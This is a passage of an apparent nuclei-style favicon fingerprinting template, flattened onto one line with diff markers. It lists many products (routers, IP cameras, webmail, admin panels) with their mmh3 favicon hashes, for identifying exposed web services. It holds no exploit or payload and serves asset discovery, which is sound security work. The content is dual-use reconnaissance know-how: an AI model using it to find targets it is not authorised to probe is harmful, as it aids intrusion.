(\"-842192932\" == mmh3(base64_py(body)))" + - type: dsl name: "fireeye" dsl: - "status_code==200 && (\"105083909\" == mmh3(base64_py(body)))" + - type: dsl name: "fireeye" dsl: - "status_code==200 && (\"240606739\" == mmh3(base64_py(body)))" + - type: dsl name: "fireeye" dsl: - "status_code==200 && (\"2121539357\" == mmh3(base64_py(body)))" + - type: dsl name: "adobe-campaign-classic" dsl: - "status_code==200 && (\"-333791179\" == mmh3(base64_py(body)))" + - type: dsl name: "xampp" dsl: - "status_code==200 && (\"-1437701105\" == mmh3(base64_py(body)))" + - type: dsl name: "niagara-web-server" dsl: - "status_code==200 && (\"-676077969\" == mmh3(base64_py(body)))" + - type: dsl name: "technicolor" dsl: - "status_code==200 && (\"-2138771289\" == mmh3(base64_py(body)))" + - type: dsl name: "hitron-technologies-inc." dsl: - "status_code==200 && (\"711742418\" == mmh3(base64_py(body)))" + - type: dsl name: "ibm-notes" dsl: - "status_code==200 && (\"728788645\" == mmh3(base64_py(body)))" + - type: dsl name: "barracuda" dsl: - "status_code==200 && (\"1436966696\" == mmh3(base64_py(body)))" + - type: dsl name: "servicenow" dsl: - "status_code==200 && (\"86919334\" == mmh3(base64_py(body)))" + - type: dsl name: "openfire-admin-console" dsl: - "status_code==200 && (\"1211608009\" == mmh3(base64_py(body)))" + - type: dsl name: "hp-ilo" dsl: - "status_code==200 && (\"2059618623\" == mmh3(base64_py(body)))" + - type: dsl name: "sunny-webbox" dsl: - "status_code==200 && (\"1975413433\" == mmh3(base64_py(body)))" + - type: dsl name: "zyxel" dsl: - "status_code==200 && (\"943925975\" == mmh3(base64_py(body)))" + - type: dsl name: "huawei" dsl: - "status_code==200 && (\"281559989\" == mmh3(base64_py(body)))" + - type: dsl name: "tenda-web-master" dsl: - "status_code==200 && (\"-2145085239\" == mmh3(base64_py(body)))" + - type: dsl name: "prometheus-time-series-collection-and-processing-server" dsl: - "status_code==200 && (\"-1399433489\" == mmh3(base64_py(body)))" + - type: dsl name: "wdcp-cloud-host-management-system" dsl: - "status_code==200 && (\"1786752597\" == mmh3(base64_py(body)))" + - type: dsl name: "domoticz-home-automation" dsl: - "status_code==200 && (\"90680708\" == mmh3(base64_py(body)))" + - type: dsl name: "tableau" dsl: - "status_code==200 && (\"-1441956789\" == mmh3(base64_py(body)))" + - type: dsl name: "openwrt-luci" dsl: - "status_code==200 && (\"-675839242\" == mmh3(base64_py(body)))" + - type: dsl name: "ubiquiti-airos" dsl: - "status_code==200 && (\"1020814938\" == mmh3(base64_py(body)))" + - type: dsl name: "mdaemon-webmail" dsl: - "status_code==200 && (\"-766957661\" == mmh3(base64_py(body)))" + - type: dsl name: "teltonika" dsl: - "status_code==200 && (\"119741608\" == mmh3(base64_py(body)))" + - type: dsl name: "entrolink" dsl: - "status_code==200 && (\"1973665246\" == mmh3(base64_py(body)))" + - type: dsl name: "windriver-webserver" dsl: - "status_code==200 && (\"74935566\" == mmh3(base64_py(body)))" + - type: dsl name: "microhard-systems" dsl: - "status_code==200 && (\"-1723752240\" == mmh3(base64_py(body)))" + - type: dsl name: "skype" dsl: - "status_code==200 && (\"-1807411396\" == mmh3(base64_py(body)))" + - type: dsl name: "teltonika" dsl: - "status_code==200 && (\"-1612496354\" == mmh3(base64_py(body)))" + - type: dsl name: "eltex-router" dsl: - "status_code==200 && (\"1877797890\" == mmh3(base64_py(body)))" + - type: dsl name: "bintec-elmeg" dsl: - "status_code==200 && (\"-375623619\" == mmh3(base64_py(body)))" + - type: dsl name: "syncthru-web-service-printers" dsl: - "status_code==200 && (\"1483097076\" == mmh3(base64_py(body)))" + - type: dsl name: "boaserver" dsl: - "status_code==200 && (\"1169183049\" == mmh3(base64_py(body)))" + - type: dsl name: "securepoint" dsl: - "status_code==200 && (\"1051648103\" == mmh3(base64_py(body)))" + - type: dsl name: "moodle" dsl: - "status_code==200 && (\"-438482901\" == mmh3(base64_py(body)))" + - type: dsl name: "radix" dsl: - "status_code==200 && (\"-1492966240\" == mmh3(base64_py(body)))" + - type: dsl name: "cradlepoint-technology-router" dsl: - "status_code==200 && (\"1466912879\" == mmh3(base64_py(body)))" + - type: dsl name: "drupal" dsl: - "status_code==200 && (\"-167656799\" == mmh3(base64_py(body)))" + - type: dsl name: "blackboard" dsl: - "status_code==200 && (\"-1593651747\" == mmh3(base64_py(body)))" + - type: dsl name: "jupyter-notebook" dsl: - "status_code==200 && (\"-895963602\" == mmh3(base64_py(body)))" + - type: dsl name: "hostmonster---web-hosting" dsl: - "status_code==200 && (\"-972810761\" == mmh3(base64_py(body)))" + - type: dsl name: "d-link-router/network" dsl: - "status_code==200 && (\"1703788174\" == mmh3(base64_py(body)))" + - type: dsl name: "rocket-chat" dsl: - "status_code==200 && (\"225632504\" == mmh3(base64_py(body)))" + - type: dsl name: "mofinetwork" dsl: - "status_code==200 && (\"-1702393021\" == mmh3(base64_py(body)))" + - type: dsl name: "zabbix" dsl: - "status_code==200 && (\"892542951\" == mmh3(base64_py(body)))" + - type: dsl name: "totolink-network" dsl: - "status_code==200 && (\"547474373\" == mmh3(base64_py(body)))" + - type: dsl name: "ossia-provision-sr-|-webcam/ip-camera" dsl: - "status_code==200 && (\"-374235895\" == mmh3(base64_py(body)))" + - type: dsl name: "cpanel-login" dsl: - "status_code==200 && (\"1544230796\" == mmh3(base64_py(body)))" + - type: dsl name: "d-link-router/network" dsl: - "status_code==200 && (\"517158172\" == mmh3(base64_py(body)))" + - type: dsl name: "jeedom-home-automation" dsl: - "status_code==200 && (\"462223993\" == mmh3(base64_py(body)))" + - type: dsl name: "jboss-application-server-7" dsl: - "status_code==200 && (\"937999361\" == mmh3(base64_py(body)))" + - type: dsl name: "niagara-web-server-/-tridium" dsl: - "status_code==200 && (\"1991562061\" == mmh3(base64_py(body)))" + - type: dsl name: "solarwinds-serv-u-ftp-server" dsl: - "status_code==200 && (\"812385209\" == mmh3(base64_py(body)))" + - type: dsl name: "aruba-virtual-controller" dsl: - "status_code==200 && (\"1142227528\" == mmh3(base64_py(body)))" + - type: dsl name: "dell" dsl: - "status_code==200 && (\"-1153950306\" == mmh3(base64_py(body)))" + - type: dsl name: "remobjects-sdk-/-remoting-sdk-for-.net-http-server-microsoft" dsl: - "status_code==200 && (\"72005642\" == mmh3(base64_py(body)))" + - type: dsl name: "zyxel-zywall" dsl: - "status_code==200 && (\"-484708885\" == mmh3(base64_py(body)))" + - type: dsl name: "visualsvn-server" dsl: - "status_code==200 && (\"706602230\" == mmh3(base64_py(body)))" + - type: dsl name: "jboss" dsl: - "status_code==200 && (\"-656811182\" == mmh3(base64_py(body)))" + - type: dsl name: "starface-voip-software" dsl: - "status_code==200 && (\"-332324409\" == mmh3(base64_py(body)))" + - type: dsl name: "netis-network-devices" dsl: - "status_code==200 && (\"-594256627\" == mmh3(base64_py(body)))" + - type: dsl name: "whm" dsl: - "status_code==200 && (\"-649378830\" == mmh3(base64_py(body)))" + - type: dsl name: "tandberg" dsl: - "status_code==200 && (\"97604680\" == mmh3(base64_py(body)))" + - type: dsl name: "ghost-cms" dsl: - "status_code==200 && (\"-1015932800\" == mmh3(base64_py(body)))" + - type: dsl name: "avtech-ip-surveillance-camera" dsl: - "status_code==200 && (\"-194439630\" == mmh3(base64_py(body)))" + - type: dsl name: "liferay-portal" dsl: - "status_code==200 && (\"129457226\" == mmh3(base64_py(body)))" + - type: dsl name: "parallels-plesk-panel" dsl: - "status_code==200 && (\"-771764544\" == mmh3(base64_py(body)))" + - type: dsl name: "odoo" dsl: - "status_code==200 && (\"-617743584\" == mmh3(base64_py(body)))" + - type: dsl name: "polycom" dsl: - "status_code==200 && (\"77044418\" == mmh3(base64_py(body)))" + - type: dsl name: "cake-php" dsl: - "status_code==200 && (\"980692677\" == mmh3(base64_py(body)))" + - type: dsl name: "exacq" dsl: - "status_code==200 && (\"476213314\" == mmh3(base64_py(body)))" + - type: dsl name: "checkpoint" dsl: - "status_code==200 && (\"794809961\" == mmh3(base64_py(body)))" + - type: dsl name: "ubiquiti-unms" dsl: - "status_code==200 && (\"1157789622\" == mmh3(base64_py(body)))" + - type: dsl name: "cpanel-login" dsl: - "status_code==200 && (\"1244636413\" == mmh3(base64_py(body)))" + - type: dsl name: "worldclient-for-mdaemon" dsl: - "status_code==200 && (\"1985721423\" == mmh3(base64_py(body)))" + - type: dsl name: "netport-software-dsl" dsl: - "status_code==200 && (\"-1124868062\" == mmh3(base64_py(body)))" + - type: dsl name: "f5-big-ip" dsl: - "status_code==200 && (\"-335242539\" == mmh3(base64_py(body)))" + - type: dsl name: "mailcow" dsl: - "status_code==200 && (\"2146763496\" == mmh3(base64_py(body)))" + - type: dsl name: "qnap-nas-virtualization-station" dsl: - "status_code==200 && (\"-1041180225\" == mmh3(base64_py(body)))" + - type: dsl name: "netgear" dsl: - "status_code==200 && (\"-1319025408\" == mmh3(base64_py(body)))" + - type: dsl name: "gogs" dsl: - "status_code==200 && (\"917966895\" == mmh3(base64_py(body)))" + - type: dsl name: "trendnet-ip-camera" dsl: - "status_code==200 && (\"512590457\" == mmh3(base64_py(body)))" + - type: dsl name: "asustor" dsl: - "status_code==200 && (\"1678170702\" == mmh3(base64_py(body)))" + - type: dsl name: "dahua" dsl: - "status_code==200 && (\"-1466785234\" == mmh3(base64_py(body)))" + - type: dsl name: "discuz!" dsl: - "status_code==200 && (\"-505448917\" == mmh3(base64_py(body)))" + - type: dsl name: "wdcp-cloud-host-management-system" dsl: - "status_code==200 && (\"255892555\" == mmh3(base64_py(body)))" + - type: dsl name: "joomla" dsl: - "status_code==200 && (\"1627330242\" == mmh3(base64_py(body)))" + - type: dsl name: "smartermail" dsl: - "status_code==200 && (\"-1935525788\" == mmh3(base64_py(body)))" + - type: dsl name: "seafile" dsl: - "status_code==200 && (\"-12700016\" == mmh3(base64_py(body)))" + - type: dsl name: "bintec-elmeg" dsl: - "status_code==200 && (\"1770799630\" == mmh3(base64_py(body)))" + - type: dsl name: "netgear-readynas" dsl: - "status_code==200 && (\"-137295400\" == mmh3(base64_py(body)))" + - type: dsl name: "ipecs" dsl: - "status_code==200 && (\"-195508437\" == mmh3(base64_py(body)))" + - type: dsl name: "bet365" dsl: - "status_code==200 && (\"-2116540786\" == mmh3(base64_py(body)))" + - type: dsl name: "reolink" dsl: - "status_code==200 && (\"-38705358\" == mmh3(base64_py(body)))" + - type: dsl name: "idera" dsl: - "status_code==200 && (\"-450254253\" == mmh3(base64_py(body)))" + - type: dsl name: "proofpoint" dsl: - "status_code==200 && (\"-1630354993\" == mmh3(base64_py(body)))" + - type: dsl name: "kerio-connect-webmail" dsl: - "status_code==200 && (\"-1678298769\" == mmh3(base64_py(body)))" + - type: dsl name: "worldclient-for-mdaemon" dsl: - "status_code==200 && (\"-35107086\" == mmh3(base64_py(body)))" + - type: dsl name: "realtek" dsl: - "status_code==200 && (\"2055322029\" == mmh3(base64_py(body)))" + - type: dsl name: "ruijie-networks-login" dsl: - "status_code==200 && (\"-692947551\" == mmh3(base64_py(body)))" + - type: dsl name: "askey-cable-modem" dsl: - "status_code==200 && (\"-1710631084\" == mmh3(base64_py(body)))" + - type: dsl name: "askey-cable-modem" dsl: - "status_code==200 && (\"89321398\" == mmh3(base64_py(body)))" + - type: dsl name: "jaws-web-server-ip-camera" dsl: - "status_code==200 && (\"90066852\" == mmh3(base64_py(body)))" + - type: dsl name: "jaws-web-server-ip-camera" dsl: - "status_code==200 && (\"768231242\" == mmh3(base64_py(body)))" + - type: dsl name: "homegrown-website-hosting" dsl: - "status_code==200 && (\"-421986013\" == mmh3(base64_py(body)))" + - type: dsl name: "technicolor-/-thomson-speedtouch-network-/-adsl" dsl: - "status_code==200 && (\"156312019\" == mmh3(base64_py(body)))" + - type: dsl name: "dvr-korean" dsl: - "status_code==200 && (\"-560297467\" == mmh3(base64_py(body)))" + - type: dsl name: "joomla" dsl: - "status_code==200 && (\"-1950415971\" == mmh3(base64_py(body)))" + - type: dsl name: "tp-link-network-device" dsl: - "status_code==200 && (\"1842351293\" == mmh3(base64_py(body)))" + - type: dsl name: "salesforce" dsl: - "status_code==200 && (\"1433417005\" == mmh3(base64_py(body)))" + - type: dsl name: "apache-haus" dsl: - "status_code==200 && (\"-632070065\" == mmh3(base64_py(body)))" + - type: dsl name: "untangle" dsl: - "status_code==200 && (\"1103599349\" == mmh3(base64_py(body)))" + - type: dsl name: "shenzhen-coship-electronics-co." dsl: - "status_code==200 && (\"224536051\" == mmh3(base64_py(body)))" + - type: dsl name: "d-link-router/network" dsl: - "status_code==200 && (\"1038500535\" == mmh3(base64_py(body)))" + - type: dsl name: "d-link-camera" dsl: - "status_code==200 && (\"-355305208\" == mmh3(base64_py(body)))" + - type: dsl name: "kibana" dsl: - "status_code==200 && (\"-267431135\" == mmh3(base64_py(body)))" + - type: dsl name: "kibana" dsl: - "status_code==200 && (\"-759754862\" == mmh3(base64_py(body)))" + - type: dsl name: "kibana" dsl: - "status_code==200 && (\"-1200737715\" == mmh3(base64_py(body)))" + - type: dsl name: "kibana" dsl: - "status_code==200 && (\"75230260\" == mmh3(base64_py(body)))" + - type: dsl name: "kibana" dsl: - "status_code==200 && (\"1668183286\" == mmh3(base64_py(body)))" + - type: dsl name: "intelbras-sa" dsl: - "status_code==200 && (\"283740897\" == mmh3(base64_py(body)))" + - type: dsl name: "icecast-streaming-media-server" dsl: - "status_code==200 && (\"1424295654\" == mmh3(base64_py(body)))" + - type: dsl name: "nec-webpro" dsl: - "status_code==200 && (\"1922032523\" == mmh3(base64_py(body)))" + - type: dsl name: "vivotek-camera" dsl: - "status_code==200 && (\"-1654229048\" == mmh3(base64_py(body)))" + - type: dsl name: "microsoft-iis" dsl: - "status_code==200 && (\"-1414475558\" == mmh3(base64_py(body)))" + - type: dsl name: "univention-portal" dsl: - "status_code==200 && (\"-1697334194\" == mmh3(base64_py(body)))" + - type: dsl name: "portainer-docker-management" dsl: - "status_code==200 && (\"-1424036600\" == mmh3(base64_py(body)))" + - type: dsl name: "nos-router" dsl: - "status_code==200 && (\"-831826827\" == mmh3(base64_py(body)))" + - type: dsl name: "tongda" dsl: - "status_code==200 && (\"-759108386\" == mmh3(base64_py(body)))" + - type: dsl name: "crushftp" dsl: - "status_code==200 && (\"-1022206565\" == mmh3(base64_py(body)))" + - type: dsl name: "endian-firewall" dsl: - "status_code==200 && (\"-1225484776\" == mmh3(base64_py(body)))" + - type: dsl name: "kerio-control-firewall" dsl: - "status_code==200 && (\"-631002664\" == mmh3(base64_py(body)))" + - type: dsl name: "ferozo-panel" dsl: - "status_code==200 && (\"2072198544\" == mmh3(base64_py(body)))" + - type: dsl name: "kerio-control-firewall" dsl: - "status_code==200 && (\"-466504476\" == mmh3(base64_py(body)))" + - type: dsl name: "cafe24-korea" dsl: - "status_code==200 && (\"1251810433\" == mmh3(base64_py(body)))" + - type: dsl name: "mautic-open-source-marketing-automation" dsl: - "status_code==200 && (\"1273982002\" == mmh3(base64_py(body)))" + - type: dsl name: "netiaspot-network" dsl: - "status_code==200 && (\"-978656757\" == mmh3(base64_py(body)))" + - type: dsl name: "multilaser" dsl: - "status_code==200 && (\"916642917\" == mmh3(base64_py(body)))" + - type: dsl name: "canvas-lms-learning-management" dsl: - "status_code==200 && (\"575613323\" == mmh3(base64_py(body)))" + - type: dsl name: "ibm-server" dsl: - "status_code==200 && (\"1726027799\" == mmh3(base64_py(body)))" + - type: dsl name: "adb-broadband-s.p.a.-network" dsl: - "status_code==200 && (\"-587741716\" == mmh3(base64_py(body)))" + - type: dsl name: "arris-network" dsl: - "status_code==200 && (\"-360566773\" == mmh3(base64_py(body)))" + - type: dsl name: "huawei-network" dsl: - "status_code==200 && (\"-884776764\" == mmh3(base64_py(body)))" + - type: dsl name: "wampserver" dsl: - "status_code==200 && (\"929825723\" == mmh3(base64_py(body)))" + - type: dsl name: "seagate-technology-nas" dsl: - "status_code==200 && (\"240136437\" == mmh3(base64_py(body)))" + - type: dsl name: "upc-ceska-republica-network" dsl: - "status_code==200 && (\"1911253822\" == mmh3(base64_py(body)))" + - type: dsl name: "flussonic-video-streaming" dsl: - "status_code==200 && (\"-393788031\" == mmh3(base64_py(body)))" + - type: dsl name: "joomla" dsl: - "status_code==200 && (\"366524387\" == mmh3(base64_py(body)))" + - type: dsl name: "wampserver" dsl: - "status_code==200 && (\"443944613\" == mmh3(base64_py(body)))" + - type: dsl name: "metabase" dsl: - "status_code==200 && (\"1953726032\" == mmh3(base64_py(body)))" + - type: dsl name: "d-link-network" dsl: - "status_code==200 && (\"-2031183903\" == mmh3(base64_py(body)))" + - type: dsl name: "mobileiron" dsl: - "status_code==200 && (\"545827989\" == mmh3(base64_py(body)))" + - type: dsl name: "mobileiron" dsl: - "status_code==200 && (\"967636089\" == mmh3(base64_py(body)))" + - type: dsl name: "mobileiron" dsl: - "status_code==200 && (\"362091310\" == mmh3(base64_py(body)))" + - type: dsl name: "mobileiron" dsl: - "status_code==200 && (\"2086228042\" == mmh3(base64_py(body)))" + - type: dsl name: "communigate" dsl: - "status_code==200 && (\"-1588746893\" == mmh3(base64_py(body)))" + - type: dsl name: "zte-network" dsl: - "status_code==200 && (\"1427976651\" == mmh3(base64_py(body)))" + - type: dsl name: "infinet-wireless-|-wanflex-network" dsl: - "status_code==200 && (\"1648531157\" == mmh3(base64_py(body)))" + - type: dsl name: "mersive-solstice" dsl: - "status_code==200 && (\"938616453\" == mmh3(base64_py(body)))" + - type: dsl name: "université-toulouse-1-capitole" dsl: - "status_code==200 && (\"1632780968\" == mmh3(base64_py(body)))" + - type: dsl name: "digium-switchvox" dsl: - "status_code==200 && (\"2068154487\" == mmh3(base64_py(body)))" + - type: dsl name: "powermta-monitoring" dsl: - "status_code==200 && (\"-1788112745\" == mmh3(base64_py(body)))" + - type: dsl name: "smartlan/g" dsl: - "status_code==200 && (\"-644617577\" == mmh3(base64_py(body)))" + - type: dsl name: "checkpoint-gaia" dsl: - "status_code==200 && (\"-1822098181\" == mmh3(base64_py(body)))" + - type: dsl name: "mailwizz" dsl: - "status_code==200 && (\"2127152956\" == mmh3(base64_py(body)))" + - type: dsl name: "rabbitmq" dsl: - "status_code==200 && (\"1064742722\" == mmh3(base64_py(body)))" + - type: dsl name: "openmediavault-nas" dsl: - "status_code==200 && (\"-693082538\" == mmh3(base64_py(body)))" + - type: dsl name: "openwrt-luci" dsl: - "status_code==200 && (\"1941381095\" == mmh3(base64_py(body)))" + - type: dsl name: "honeywell" dsl: - "status_code==200 && (\"903086190\" == mmh3(base64_py(body)))" + - type: dsl name: "bomgar-support-portal" dsl: - "status_code==200 && (\"829321644\" == mmh3(base64_py(body)))" + - type: dsl name: "nuxt-js" dsl: - "status_code==200 && (\"-1442789563\" == mmh3(base64_py(body)))" + - type: dsl name: "roundcube-webmail" dsl: - "status_code==200 && (\"-2140379067\" == mmh3(base64_py(body)))" + - type: dsl name: "d-link-camera" dsl: - "status_code==200 && (\"-1897829998\" == mmh3(base64_py(body)))" + - type: dsl name: "netgear-network" dsl: - "status_code==200 && (\"1047213685\" == mmh3(base64_py(body)))" + - type: dsl name: "sonarqube" dsl: - "status_code==200 && (\"1485257654\" == mmh3(base64_py(body)))" + - type: dsl name: "lupus-electronics-xt" dsl: - "status_code==200 && (\"-299324825\" == mmh3(base64_py(body)))" + - type: dsl name: "vanderbilt-spc" dsl: - "status_code==200 && (\"-1162730477\" == mmh3(base64_py(body)))" + - type: dsl name: "vzpp-plesk" dsl: - "status_code==200 && (\"-1268095485\" == mmh3(base64_py(body)))" + - type: dsl name: "baidu" dsl: - "status_code==200 && (\"1118684072\" == mmh3(base64_py(body)))" + - type: dsl name: "owncloud" dsl: - "status_code==200 && (\"-1616115760\" == mmh3(base64_py(body)))" + - type: dsl name: "sentora" dsl: - "status_code==200 && (\"-2054889066\" == mmh3(base64_py(body)))" + - type: dsl name: "alfresco" dsl: - "status_code==200 && (\"1333537166\" == mmh3(base64_py(body)))" + - type: dsl name: "digital-keystone-dk" dsl: - "status_code==200 && (\"-373674173\" == mmh3(base64_py(body)))" + - type: dsl name: "wispr-airlan" dsl: - "status_code==200 && (\"-106646451\" == mmh3(base64_py(body)))" + - type: dsl name: "synology-vpn-plus" dsl: - "status_code==200 && (\"1235070469\" == mmh3(base64_py(body)))" + - type: dsl name: "sentry" dsl: - "status_code==200 && (\"2063428236\" == mmh3(base64_py(body)))" + - type: dsl name: "watchguard" dsl: - "status_code==200 && (\"15831193\" == mmh3(base64_py(body)))" + - type: dsl name: "web-client-pro" dsl: - "status_code==200 && (\"-956471263\" == mmh3(base64_py(body)))" + - type: dsl name: "tecvoz" dsl: - "status_code==200 && (\"-1452159623\" == mmh3(base64_py(body)))" + - type: dsl name: "mdaemon-remote-administration" dsl: - "status_code==200 && (\"99432374\" == mmh3(base64_py(body)))" + - type: dsl name: "paradox-ip-module" dsl: - "status_code==200 && (\"727253975\" == mmh3(base64_py(body)))" + - type: dsl name: "dokuwiki" dsl: - "status_code==200 && (\"-630493013\" == mmh3(base64_py(body)))" + - type: dsl name: "sails" dsl: - "status_code==200 && (\"552597979\" == mmh3(base64_py(body)))" + - type: dsl name: "fastpanel-hosting" dsl: - "status_code==200 && (\"774252049\" == mmh3(base64_py(body)))" + - type: dsl name: "c-lodop" dsl: - "status_code==200 && (\"-329747115\" == mmh3(base64_py(body)))" + - type: dsl name: "jamf-pro-login" dsl: - "status_code==200 && (\"1262005940\" == mmh3(base64_py(body)))" + - type: dsl name: "struxureware-schneider-electric" dsl: - "status_code==200 && (\"979634648\" == mmh3(base64_py(body)))" + - type: dsl name: "axcient-replibit-management-server" dsl: - "status_code==200 && (\"475379699\" == mmh3(base64_py(body)))" + - type: dsl name: "twonky-server-media-streaming" dsl: - "status_code==200 && (\"-878891718\" == mmh3(base64_py(body)))" + - type: dsl name: "windows-azure" dsl: - "status_code==200 && (\"-2125083197\" == mmh3(base64_py(body)))" + - type: dsl name: "isp-manager-web-hosting-panel" dsl: - "status_code==200 && (\"-1151675028\" == mmh3(base64_py(body)))" + - type: dsl name: "jupyterhub" dsl: - "status_code==200 && (\"1248917303\" == mmh3(base64_py(body)))" + - type: dsl name: "centurylink-modem-gui-login-eg" dsl: - "status_code==200 && (\"-1908556829\" == mmh3(base64_py(body)))" + - type: dsl name: "tecvoz" dsl: - "status_code==200 && (\"1059329877\" == mmh3(base64_py(body)))" + - type: dsl name: "opnsense" dsl: - "status_code==200 && (\"-1148190371\" == mmh3(base64_py(body)))" + - type: dsl name: "ligowave-network" dsl: - "status_code==200 && (\"1467395679\" == mmh3(base64_py(body)))" + - type: dsl name: "rumpus" dsl: - "status_code==200 && (\"-1528414776\" == mmh3(base64_py(body)))" + - type: dsl name: "spiceworks-panel" dsl: - "status_code==200 && (\"-2117390767\" == mmh3(base64_py(body)))" + - type: dsl name: "teamcity" dsl: - "status_code==200 && (\"-1944119648\" == mmh3(base64_py(body)))" + - type: dsl name: "instar-full-hd-ip-camera" dsl: - "status_code==200 && (\"-1748763891\" == mmh3(base64_py(body)))" + - type: dsl name: "gpon-home-gateway" dsl: - "status_code==200 && (\"251106693\" == mmh3(base64_py(body)))" + - type: dsl name: "alienvault" dsl: - "status_code==200 && (\"-1779611449\" == mmh3(base64_py(body)))" + - type: dsl name: "arbor-networks" dsl: - "status_code==200 && (\"-1745552996\" == mmh3(base64_py(body)))" + - type: dsl name: "accrisoft" dsl: - "status_code==200 && (\"-1275148624\" == mmh3(base64_py(body)))" + - type: dsl name: "yasni" dsl: - "status_code==200 && (\"-178685903\" == mmh3(base64_py(body)))" + - type: dsl name: "slack" dsl: - "status_code==200 && (\"-43161126\" == mmh3(base64_py(body)))" + - type: dsl name: "innovaphone" dsl: - "status_code==200 && (\"671221099\" == mmh3(base64_py(body)))" + - type: dsl name: "shinobi-cctv" dsl: - "status_code==200 && (\"-10974981\" == mmh3(base64_py(body)))" + - type: dsl name: "tp-link-network-device" dsl: - "status_code==200 && (\"1274078387\" == mmh3(base64_py(body)))" + - type: dsl name: "siemens-ozw772" dsl: - "status_code==200 && (\"-336242473\" == mmh3(base64_py(body)))" + - type: dsl name: "lantronix-spider" dsl: - "status_code==200 && (\"882208493\" == mmh3(base64_py(body)))" + - type: dsl name: "claimtime-ramsell-public-health-&-safety" dsl: - "status_code==200 && (\"-687783882\" == mmh3(base64_py(body)))" + - type: dsl name: "surfilter-ssl-vpn-portal" dsl: - "status_code==200 && (\"-590892202\" == mmh3(base64_py(body)))" + - type: dsl name: "kyocera-printer" dsl: - "status_code==200 && (\"-50306417\" == mmh3(base64_py(body)))" + - type: dsl name: "lucee!" dsl: - "status_code==200 && (\"784872924\" == mmh3(base64_py(body)))" + - type: dsl name: "ricoh" dsl: - "status_code==200 && (\"1135165421\" == mmh3(base64_py(body)))" + - type: dsl name: "handle-proxy" dsl: - "status_code==200 && (\"926501571\" == mmh3(base64_py(body)))" + - type: dsl name: "metasploit" dsl: - "status_code==200 && (\"579239725\" == mmh3(base64_py(body)))" + - type: dsl name: "iomega-nas" dsl: - "status_code==200 && (\"-689902428\" == mmh3(base64_py(body)))" + - type: dsl name: "iomega-nas" dsl: - "status_code==200 && (\"-600508822\" == mmh3(base64_py(body)))" + - type: dsl name: "iomega-nas" dsl: - "status_code==200 && (\"656868270\" == mmh3(base64_py(body)))" + - type: dsl name: "iomega-nas" dsl: - "status_code==200 && (\"-2056503929\" == mmh3(base64_py(body)))" + - type: dsl name: "iomega-nas" dsl: - "status_code==200 && (\"-1656695885\" == mmh3(base64_py(body)))" + - type: dsl name: "iomega-nas" dsl: - "status_code==200 && (\"331870709\" == mmh3(base64_py(body)))" + - type: dsl name: "iomega-nas" dsl: - "status_code==200 && (\"1241049726\" == mmh3(base64_py(body)))" + - type: dsl name: "iomega-nas" dsl: - "status_code==200 && (\"998138196\" == mmh3(base64_py(body)))" + - type: dsl name: "iomega-nas" dsl: - "status_code==200 && (\"322531336\" == mmh3(base64_py(body)))" + - type: dsl name: "iomega-nas" dsl: - "status_code==200 && (\"-401934945\" == mmh3(base64_py(body)))" + - type: dsl name: "iomega-nas" dsl: - "status_code==200 && (\"-613216179\" == mmh3(base64_py(body)))" + - type: dsl name: "chef-automate" dsl: - "status_code==200 && (\"-276759139\" == mmh3(base64_py(body)))" + - type: dsl name: "gargoyle-router-management-utility" dsl: - "status_code==200 && (\"1862132268\" == mmh3(base64_py(body)))" + - type: dsl name: "keepitsafe-management-console" dsl: - "status_code==200 && (\"-1738727418\" == mmh3(base64_py(body)))" + - type: dsl name: "entronix-energy-management-platform" dsl: - "status_code==200 && (\"-368490461\" == mmh3(base64_py(body)))" + - type: dsl name: "openproject" dsl: - "status_code==200 && (\"1836828108\" == mmh3(base64_py(body)))" + - type: dsl name: "unified-management-console-polycom" dsl: - "status_code==200 && (\"-1775553655\" == mmh3(base64_py(body)))" + - type: dsl name: "moxapass-iologik-remote-ethernet-i/o-server-" dsl: - "status_code==200 && (\"381100274\" == mmh3(base64_py(body)))" + - type: dsl name: "hfs-http-file-server" dsl: - "status_code==200 && (\"2124459909\" == mmh3(base64_py(body)))" + - type: dsl name: "hfs-http-file-server" dsl: - "status_code==200 && (\"731374291\" == mmh3(base64_py(body)))" + - type: dsl name: "traccar-gps-tracking" dsl: - "status_code==200 && (\"-335153896\" == mmh3(base64_py(body)))" + - type: dsl name: "iw" dsl: - "status_code==200 && (\"896412703\" == mmh3(base64_py(body)))" + - type: dsl name: "wordpress-under-construction-icon" dsl: - "status_code==200 && (\"191654058\" == mmh3(base64_py(body)))" + - type: dsl name: "combivox" dsl: - "status_code==200 && (\"-342262483\" == mmh3(base64_py(body)))" + - type: dsl name: "netcomwireless-network" dsl: - "status_code==200 && (\"5542029\" == mmh3(base64_py(body)))" + - type: dsl name: "elastic-database" dsl: - "status_code==200 && (\"1552860581\" == mmh3(base64_py(body)))" + - type: dsl name: "drupal" dsl: - "status_code==200 && (\"1174841451\" == mmh3(base64_py(body)))" + - type: dsl name: "truvision-nvr" dsl: - "status_code==200 && (\"-1093172228\" == mmh3(base64_py(body)))" + - type: dsl name: "spamexperts" dsl: - "status_code==200 && (\"-1688698891\" == mmh3(base64_py(body)))" + - type: dsl name: "sonatype-nexus-repository-manager" dsl: - "status_code==200 && (\"-1546574541\" == mmh3(base64_py(body)))" + - type: dsl name: "idirect-canada-network-management" dsl: - "status_code==200 && (\"-256828986\" == mmh3(base64_py(body)))" + - type: dsl name: "openerp-now-known-as-odoo" dsl: - "status_code==200 && (\"1966198264\" == mmh3(base64_py(body)))" + - type: dsl name: "pkp-openjournalsystems-public-knowledge-project" dsl: - "status_code==200 && (\"2099342476\" == mmh3(base64_py(body)))" + - type: dsl name: "liquidfiles" dsl: - "status_code==200 && (\"541087742\" == mmh3(base64_py(body)))" + - type: dsl name: "zyxel-network" dsl: - "status_code==200 && (\"-882760066\" == mmh3(base64_py(body)))" + - type: dsl name: "universal-devices-ud" dsl: - "status_code==200 && (\"16202868\" == mmh3(base64_py(body)))" + - type: dsl name: "huawei-network" dsl: - "status_code==200 && (\"987967490\" == mmh3(base64_py(body)))" + - type: dsl name: "gm77[.]com" dsl: - "status_code==200 && (\"-647318973\" == mmh3(base64_py(body)))" + - type: dsl name: "okazik[.]pl" dsl: - "status_code==200 && (\"-1583478052\" == mmh3(base64_py(body)))" + - type: dsl name: "gitea" dsl: - "status_code==200 && (\"1969970750\" == mmh3(base64_py(body)))" + - type: dsl name: "tc-group" dsl: - "status_code==200 && (\"-1734573358\" == mmh3(base64_py(body)))" + - type: dsl name: "deluge-web-ui" dsl: - "status_code==200 && (\"-1589842876\" == mmh3(base64_py(body)))" + - type: dsl name: "登录-amh" dsl: - "status_code==200 && (\"1822002133\" == mmh3(base64_py(body)))" + - type: dsl name: 